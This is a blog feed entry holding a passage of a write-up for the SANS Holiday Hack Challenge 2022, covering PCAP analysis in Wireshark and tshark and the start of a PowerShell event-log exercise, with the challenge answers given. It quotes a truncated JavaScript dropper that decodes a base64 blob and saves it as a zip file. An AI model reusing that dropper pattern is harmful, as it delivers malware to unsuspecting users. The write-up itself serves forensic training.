<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom"><title>All Your Base Are Belong To Me</title><link href="https://allyourbase.utouch.fr/" rel="alternate"></link><link href="https://allyourbase.utouch.fr/feeds/all.atom.xml" rel="self"></link><id>https://allyourbase.utouch.fr/</id><updated>2023-01-06T00:00:00+01:00</updated><subtitle>You know, if that's alright with you</subtitle><entry><title>SANS Christmas Challenge 2022</title><link href="https://allyourbase.utouch.fr/posts/2023/01/06/sans-christmas-challenge-2022/" rel="alternate"></link><published>2023-01-06T00:00:00+01:00</published><updated>2023-01-06T00:00:00+01:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2023-01-06:/posts/2023/01/06/sans-christmas-challenge-2022/</id><summary type="html">&lt;img alt="The SANS 2022 Christmas Challenge. In the background, a hill top, with a frozen castle and a frozen dungeon. In the foreground, the text &amp;quot;Holiday Hack Challenge 2022 now open&amp;quot;." class="align-center" src="/images/sans-christmas-challenge-2022/sans_christmas_challenge_2022_logo.png" /&gt;
&lt;p&gt;Five Rings to rule them all, Five Rings to find them,&lt;/p&gt;
&lt;p&gt;Five Rings to bring them all and in the darkness pwn them.&lt;/p&gt;
&lt;p&gt;In the Land of Kringle where the Red-teamers lie.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;(see, I can mix it up)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Here's my write-up for the &lt;a class="reference external" href="https://holidayhackchallenge.com/2022/"&gt;2022 SANS Christmas Challenge&lt;/a&gt;.&lt;/p&gt;
&lt;div class="contents topic" id="table-of-contents"&gt;
&lt;p class="topic-title"&gt;Table of contents …&lt;/p&gt;&lt;/div&gt;</summary><content type="html">&lt;img alt="The SANS 2022 Christmas Challenge. In the background, a hill top, with a frozen castle and a frozen dungeon. In the foreground, the text &amp;quot;Holiday Hack Challenge 2022 now open&amp;quot;." class="align-center" src="/images/sans-christmas-challenge-2022/sans_christmas_challenge_2022_logo.png" /&gt;
&lt;p&gt;Five Rings to rule them all, Five Rings to find them,&lt;/p&gt;
&lt;p&gt;Five Rings to bring them all and in the darkness pwn them.&lt;/p&gt;
&lt;p&gt;In the Land of Kringle where the Red-teamers lie.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;(see, I can mix it up)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Here's my write-up for the &lt;a class="reference external" href="https://holidayhackchallenge.com/2022/"&gt;2022 SANS Christmas Challenge&lt;/a&gt;.&lt;/p&gt;
&lt;div class="contents topic" id="table-of-contents"&gt;
&lt;p class="topic-title"&gt;Table of contents&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference internal" href="#introduction" id="id1"&gt;Introduction&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#kringlecon-orientation" id="id2"&gt;KringleCon Orientation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#recover-the-tolkien-ring" id="id3"&gt;Recover the Tolkien Ring&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#wireshark-practice" id="id4"&gt;Wireshark Practice&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#windows-event-logs" id="id5"&gt;Windows Event Logs&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#suricata-regatta" id="id6"&gt;Suricata Regatta&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#recover-the-elfen-ring" id="id7"&gt;Recover the Elfen Ring&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#clone-with-a-difference" id="id8"&gt;Clone with a Difference&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#prison-escape" id="id9"&gt;Prison Escape&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#jolly-ci-cd" id="id10"&gt;Jolly CI/CD&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#recover-the-web-ring" id="id11"&gt;Recover the Web Ring&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#naughty-ip" id="id12"&gt;Naughty IP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#credential-mining" id="id13"&gt;Credential Mining&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#ftw" id="id14"&gt;404 FTW&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#imds-xxe-and-other-abbreviations" id="id15"&gt;IMDS, XXE, and Other Abbreviations&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#open-boria-mine-door" id="id16"&gt;Open Boria Mine Door&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#cell-1" id="id17"&gt;Cell 1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#cell-2" id="id18"&gt;Cell 2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#cell-3" id="id19"&gt;Cell 3&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#cell-4" id="id20"&gt;Cell 4&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#cell-5" id="id21"&gt;Cell 5&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#cell-6" id="id22"&gt;Cell 6&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#glamtariel-s-fountain" id="id23"&gt;Glamtariel's Fountain&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#recover-the-cloud-ring" id="id24"&gt;Recover the Cloud Ring&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#aws-cli-intro" id="id25"&gt;AWS CLI Intro&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#trufflehog-search" id="id26"&gt;Trufflehog Search&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#exploitation-via-aws-cli" id="id27"&gt;Exploitation via AWS CLI&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#recover-the-burning-ring-of-fire" id="id28"&gt;Recover the Burning Ring of Fire&lt;/a&gt;&lt;ul&gt;
&lt;li&gt;&lt;a class="reference internal" href="#buy-a-hat" id="id29"&gt;Buy a Hat&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#blockchain-divination" id="id30"&gt;Blockchain Divination&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#exploit-a-smart-contract" id="id31"&gt;Exploit a Smart Contract&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a class="reference internal" href="#conclusion" id="id32"&gt;Conclusion&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="section" id="introduction"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id1"&gt;Introduction&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;New year, new KringleCon! However, Santa has lost his Five Golden Rings and
can't perform his magic. He has given us the task of retrieving them in the
caves that lay below his frozen castle. Let's go!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="kringlecon-orientation"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id2"&gt;KringleCon Orientation&lt;/a&gt;&lt;/h2&gt;
&lt;img alt="Jingle Ringford. She's an elf with pointy ears. She's wearing a white t-shirt, a brown skirt and black shoes. She also has a pink christmas hat on her head. She's smiling." class="align-center" src="/images/sans-christmas-challenge-2022/jingleringford.png" /&gt;
&lt;p&gt;&lt;em&gt;Jingle Ringford says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Welcome to the North Pole, KringleCon, and the 2022 SANS Holiday Hack
Challenge! I’m Jingle Ringford, one of Santa’s elves.&lt;/p&gt;
&lt;p&gt;Santa asked me to come here and give you a short orientation to this
festive event.&lt;/p&gt;
&lt;p&gt;Before you move forward through the gate, I’ll ask you to accomplish a few
simple tasks.&lt;/p&gt;
&lt;p&gt;First things first, here's your badge! It's the five golden rings in the
middle of your avatar.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We now have a badge on our avatar.&lt;/p&gt;
&lt;img alt="Jingle Ringford, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/jingleringford.png" /&gt;
&lt;p&gt;&lt;em&gt;Jingle Ringford says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Great - now you're official!&lt;/p&gt;
&lt;p&gt;Click on the badge on your avatar. That’s where you will see your
Objectives, Hints, and gathered Items for the Holiday Hack Challenge.&lt;/p&gt;
&lt;p&gt;We’ve also got handy links to the KringleCon talks and more there for you!&lt;/p&gt;
&lt;p&gt;Next, click on that machine to the left and create a crypto wallet for
yourself. Don't lose that key!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We click on the KringleCoin Teller Machine to create our account:&lt;/p&gt;
&lt;img alt="The first screen of the KringleCoin Teller Machine. It reads: &amp;quot;KringleCoin Teller Machine - Account Creation. Welcome to the KringleCoin Network! We're glad you're here! Hello! This system is designed to help you with the process of creating a cryptocurrency wallet! We will do all of the tedious, difficult work for you - you just need to do one, VERY important thing: We're going to be showing you some very important information: YOU will need to keep track of it. If you lose the private key to your wallet... well, we don't even want to think about that.  Probably the only thing on earth that could save you is some genuine Santa-type magic... So please PLEASE get prepared to copy down the information we're going to present to you on the next screen.&amp;quot; Below the text, there is a green button that reads &amp;quot;Click here when you're ready to proceed&amp;quot;." class="align-center" src="/images/sans-christmas-challenge-2022/wallet_creation_1.png" /&gt;
&lt;p&gt;We click on the green button:&lt;/p&gt;
&lt;img alt="The second screen of the KringleCoin Teller Machine. It reads: &amp;quot;It appears that you currently do not have a KringleCoin wallet. You'll need one while you're here at the North Pole. Let's get started and set up your wallet. You'll earn KringleCoins for completing challenges or you just might be lucky enought to find some! Who knows! Your KringleCoin wallet consists of two values, a WalletAddress and a Private (Secret) Key. This is critically important: YOU are responsible for keeping track of your account information. If you come back here, we can tell you your WalletAddress, but (and this is very, VERY important) we CANNOT tell you your secret key. If you lose it, you lose access to your KringleCoins. Here is your KringleCoin wallet information: WalletAddress: an hexadecimal value Key: a censored hexadecimal value" class="align-center" src="/images/sans-christmas-challenge-2022/wallet_creation_2.png" /&gt;
&lt;p&gt;Now you didn't think I would publish my secret key and let y'all steal my
precious KringleCoins, right?&lt;/p&gt;
&lt;img alt="Jingle Ringford, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/jingleringford.png" /&gt;
&lt;p&gt;&lt;em&gt;Jingle Ringford says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Fantastic!&lt;/p&gt;
&lt;p&gt;OK, one last thing. Click on the &lt;strong&gt;Cranberry Pi Terminal&lt;/strong&gt; and follow the
on-screen instructions.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The Cranberry Pi Terminal is divided in two panes: an upper pane that reads&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Enter the answer here

&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;and a lower pane that reads:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Welcome to the first terminal challenge!

This one is intentionaly simple. All we need to do is:

- Click in the upper pane of this terminal
- Type answer and press Enter
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We do so, and bingo:&lt;/p&gt;
&lt;img alt="Jingle Ringford, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/jingleringford.png" /&gt;
&lt;p&gt;&lt;em&gt;Jingle Ringford says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
Great! Your orientation is now complete! You can enter through the gate
now. Have FUN!!!&lt;/blockquote&gt;
&lt;p&gt;We can now enter the North Pole, where we find Santa:&lt;/p&gt;
&lt;img alt="Santa Claus. He's wearing his usual attire: a red suit with a red Christmas hat, and a brown belt with a golden buckle." class="align-center" src="/images/sans-christmas-challenge-2022/santa.png" /&gt;
&lt;p&gt;&lt;em&gt;Santa says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Welcome to the North Pole, intrepid traveler!&lt;/p&gt;
&lt;p&gt;Wow, we had quite a storm last night!&lt;/p&gt;
&lt;p&gt;My castle door is sealed shut behind a giant snowbank.&lt;/p&gt;
&lt;p&gt;The Elves have decided to burrow under the snow to get everything ready for
our holiday deliveries.&lt;/p&gt;
&lt;p&gt;But there's another wrinkle: my Five Golden Rings have gone missing.&lt;/p&gt;
&lt;p&gt;Without the magic of the Rings, we simply can't launch the holiday season.&lt;/p&gt;
&lt;p&gt;My reindeer won't fly; I won't be able to zip up and down chimneys.&lt;/p&gt;
&lt;p&gt;What's worse, without the magic Rings, I can't fit the millions of cookies
in my belly!&lt;/p&gt;
&lt;p&gt;I challenge you to go on a quest to find and retrieve each of the five
Rings.&lt;/p&gt;
&lt;p&gt;I'll put some initial goals in your badge for you.&lt;/p&gt;
&lt;p&gt;The holidays, and the whole world, are counting on you.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div class="section" id="recover-the-tolkien-ring"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id3"&gt;Recover the Tolkien Ring&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;We go down under the snow, to recover the first ring, the Tolkien Ring, where
we come upon Grinchum:&lt;/p&gt;
&lt;img alt="Grinchum looks like an elf. He's crouching. His torso is bared and he's wearing a brown loincloth, and a red Christmas hat. He's frowning but he looks quite pleased. Anyway you get it, he looks like Gollum from The Lord of the Rings, but with a Christmas hat." class="align-center" src="/images/sans-christmas-challenge-2022/smeagol.png" /&gt;
&lt;p&gt;&lt;em&gt;Grinchum says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;em&gt;Preciousesss....&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Don't worry, you are hidden. You are safe.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="section" id="wireshark-practice"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id4"&gt;Wireshark Practice&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Moving on, we enter what looks like the kitchen, where we find Sparkle
Redberry.&lt;/p&gt;
&lt;img alt="Sparkle Redberry is an elf with green skin. He's wearing a white sweater with green pants and purple shoes. He also has a green Christmas hat on his head. He looks non-plussed." class="align-center" src="/images/sans-christmas-challenge-2022/sparkleredberry.png" /&gt;
&lt;p&gt;&lt;em&gt;Sparkle Redberry says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hey there! I’m Sparkle Redberry. We have a bit of an incident here.&lt;/p&gt;
&lt;p&gt;We were baking lembanh in preparation for the holidays.&lt;/p&gt;
&lt;p&gt;It started to smell a little funky, and then suddenly, a Snowrog crashed through the wall!&lt;/p&gt;
&lt;p&gt;We're trying to investigate what caused this, so we can make it go away.&lt;/p&gt;
&lt;p&gt;Have you used Wireshark to look at packet capture (PCAP) files before?&lt;/p&gt;
&lt;p&gt;I've got a &lt;a class="reference external" href="/docs/sans-christmas-challenge-2022/suspicious.pcap"&gt;PCAP&lt;/a&gt;
you might find interesting.&lt;/p&gt;
&lt;p&gt;Once you've had a chance to look at it, please open this terminal and answer the questions in the top pane.&lt;/p&gt;
&lt;p&gt;Thanks for helping us get to the bottom of this!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let's download the given PCAP and open up the terminal:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;There are objects in the PCAP file that can be exported by Wireshark and/or
Tshark. What type of objects can be exported from this PCAP?
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's open the PCAP file in Wireshark:&lt;/p&gt;
&lt;img alt="The suspicious.pcap file opened in Wireshark. We mostly see HTTP traffic." class="align-center" src="/images/sans-christmas-challenge-2022/tolkien_ring_wireshark_init.png" /&gt;
&lt;p&gt;It looks like this is mainly HTTP traffic. If we go to the &lt;code&gt;File &amp;gt;
Export Objects&lt;/code&gt; menu in Wireshark, we can see several object types, but only
the &lt;code&gt;HTTP&lt;/code&gt; entry gives us a file that can be extracted:&lt;/p&gt;
&lt;img alt="The HTTP file export functionality. We see three entries: 1. app.php, size of 754 bytes, starts at packet number 8. 2. app.php (again), size of 808 kB, starts at packet number 687. 3. favicon.ico, size of 1130 bytes, starts at packet number 692." class="align-center" src="/images/sans-christmas-challenge-2022/tolkien_ring_wireshark_file_export.png" /&gt;
&lt;p&gt;So, the answer is &lt;code&gt;HTTP&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;What is the file name of the largest file we can export?
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can easily see from the previous screenshot that, with a size of 808 kB,
the &lt;code&gt;app.php&lt;/code&gt; file is the largest.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;What packet number starts that app.php file?
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;There are two entries for the &lt;code&gt;app.php&lt;/code&gt; file, however, the largest one
starts at packet number &lt;code&gt;687&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;What is the IP of the Apache server?
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's go to packet number &lt;code&gt;687&lt;/code&gt;:&lt;/p&gt;
&lt;img alt="Packet 687. We see the response from the Apache server, with a source IP of 192.185.57.242." class="align-center" src="/images/sans-christmas-challenge-2022/tolkien_ring_wireshark_apache_ip.png" /&gt;
&lt;p&gt;We can see that the HTTP server is responding with an HTTP code 200. Therefore,
the source IP address corresponds to the Apache server: &lt;code&gt;192.185.57.242&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;What file is saved to the infected host?
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's use the &lt;code&gt;File &amp;gt; Export Objects &amp;gt; HTTP&lt;/code&gt; menu to export the large
&lt;code&gt;app.php&lt;/code&gt; file. If we take a look inside, we can see that a large blob
is base64-decoded, before being saved to file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kd"&gt;let&lt;/span&gt; &lt;span class="nx"&gt;byteCharacters&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;atob&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;UEsDBBQAAAAIAFCjN1FIq7H4ezsJAI[...]JAAAA&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="kd"&gt;let&lt;/span&gt; &lt;span class="nx"&gt;byteNumbers&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nb"&gt;Array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;byteCharacters&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;let&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="nx"&gt;byteCharacters&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;length&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nx"&gt;byteNumbers&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;byteCharacters&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;charCodeAt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;i&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="kd"&gt;let&lt;/span&gt; &lt;span class="nx"&gt;byteArray&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nx"&gt;Uint8Array&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;byteNumbers&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="c1"&gt;// now that we have the byte array, construct the blob from it&lt;/span&gt;
    &lt;span class="kd"&gt;let&lt;/span&gt; &lt;span class="nx"&gt;blob1&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nx"&gt;Blob&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="nx"&gt;byteArray&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nx"&gt;type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;application/octet-stream&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;});&lt;/span&gt;

&lt;span class="hll"&gt;    &lt;span class="nx"&gt;saveAs&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;blob1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Ref_Sept24-2020.zip&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;
&lt;span class="p"&gt;})();&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The file is named &lt;code&gt;Ref_Sept24-2020.zip&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Attackers used bad TLS certificates in this traffic. Which countries were
they registered to? Submit the names of the countries in alphabetical
order separated by commas (Ex: Norway, South Korea).
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's use some &lt;code&gt;tshark&lt;/code&gt; to easily extract the value of the field we are
interested in. The interesting field name to extract the country a certificate
was registered to is &lt;a class="reference external" href="https://www.wireshark.org/docs/dfref/x/x509sat.html"&gt;x509sat.CountryName&lt;/a&gt;.
With a little clean-up, we get the following country names:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; tshark -r suspicious.pcap -T fields -e x509sat.CountryName &lt;span class="p"&gt;|&lt;/span&gt; tr &lt;span class="s1"&gt;&amp;#39;,&amp;#39;&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;\n&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; sort -u

&lt;span class="go"&gt;IE&lt;/span&gt;
&lt;span class="go"&gt;IL&lt;/span&gt;
&lt;span class="go"&gt;SS&lt;/span&gt;
&lt;span class="go"&gt;US&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;By using the full names of the countries, we get &lt;code&gt;Ireland, Israel, South
Sudan, United States of America&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Is the host infected (Yes/No)?
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Well if some weird behavior has been observed, it's most likely that the host
has been infected: &lt;code&gt;Yes&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;After answering all questions properly, we talk to Sparkle Redberry again:&lt;/p&gt;
&lt;img alt="Sparkle Redberry, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/sparkleredberry.png" /&gt;
&lt;p&gt;&lt;em&gt;Sparkle Redberry says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You got it - wonderful!&lt;/p&gt;
&lt;p&gt;So hey, when you're looking at the next terminal, remember you have
multiple filetypes and tools you can utilize.&lt;/p&gt;
&lt;p&gt;Conveniently for us, we can use programs already installed on every Windows
computer.&lt;/p&gt;
&lt;p&gt;So if you brought your own Windows machine, you can save the files to it
and use whatever method is your favorite.&lt;/p&gt;
&lt;p&gt;Oh yeah! If you wanna learn more, or get stuck, I hear &lt;a class="reference external" href="https://youtu.be/5NZeHYPMXAE"&gt;Eric Pursley's&lt;/a&gt; talk is about this very topic.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div class="section" id="windows-event-logs"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id5"&gt;Windows Event Logs&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We move on to find Dusty Giftwrap:&lt;/p&gt;
&lt;img alt="Dusty Giftwrap is an elf with glasses and a white beard. He's wearing a green coat with white fur, a brown skirt, black shoes, and a purple Christmas hat." class="align-center" src="/images/sans-christmas-challenge-2022/dustygiftwrap.png" /&gt;
&lt;p&gt;&lt;em&gt;Dusty Giftwrap says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hi! I'm Dusty Giftwrap!&lt;/p&gt;
&lt;p&gt;We think the Snowrog was attracted to the pungent smell from the baking lembanh.&lt;/p&gt;
&lt;p&gt;I'm trying to discover which ingredient could be causing such a stench.&lt;/p&gt;
&lt;p&gt;I think the answer may be in these suspicious logs.&lt;/p&gt;
&lt;p&gt;I'm focusing on Windows Powershell logs. Do you have much experience there?&lt;/p&gt;
&lt;p&gt;You can work on this &lt;a class="reference external" href="/docs/sans-christmas-challenge-2022/powershell.evtx"&gt;offline&lt;/a&gt;
or try it in this terminal.&lt;/p&gt;
&lt;p&gt;Golly, I'd appreciate it if you could take a look.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Let's lend a hand:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Grinchum successfully downloaded his keylogger and has gathered the admin
credentials!

We think he used PowerShell to find the Lembanh recipe and steal our secret
ingredient.

Luckily, we enabled PowerShell auditing and have exported the Windows
PowerShell logs to a flat text file.

Please help me analyze this file and answer my questions.

Ready to begin?
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ready!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;1. What month/day/year did the attack take place? For example, 09/05/2021.
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's use &lt;a class="reference external" href="https://github.com/omerbenamram/evtx"&gt;evtx&lt;/a&gt; to easily parse the
EVTX file, by converting it to JSON:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ~/bin/evtx/evtx -o json -f powershell.json powershell.evtx
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, let's search for &lt;code&gt;Lembanh&lt;/code&gt; in the file. We see some weird stuff
around here:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="nt"&gt;&amp;quot;Event&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="nt"&gt;&amp;quot;#attributes&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nt"&gt;&amp;quot;xmlns&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;http://schemas.microsoft.com/win/2004/08/events/event&amp;quot;&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt;
